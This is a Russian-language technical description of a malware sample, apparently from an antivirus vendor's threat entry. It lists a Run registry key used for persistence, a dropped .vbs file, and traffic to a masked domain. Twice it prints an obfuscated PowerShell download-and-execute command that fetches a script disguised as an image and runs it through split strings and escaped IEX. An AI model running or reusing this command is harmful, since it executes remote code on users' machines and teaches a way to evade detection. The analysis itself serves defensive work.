Техническая информация
Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'WinAppUpdate' = '"%HOMEPATH%\<Имя файла>.vbs"'
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\<Имя файла>.vbs
Сетевая активность
TCP
- 'up##0.com':443
UDP
- DNS ASK up##0.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''https://www.up##0.com/i/00194/bgc29dskq0lo.jpg'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''https://www.up##0.com/i/00194/bgc29dskq0lo.jpg'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
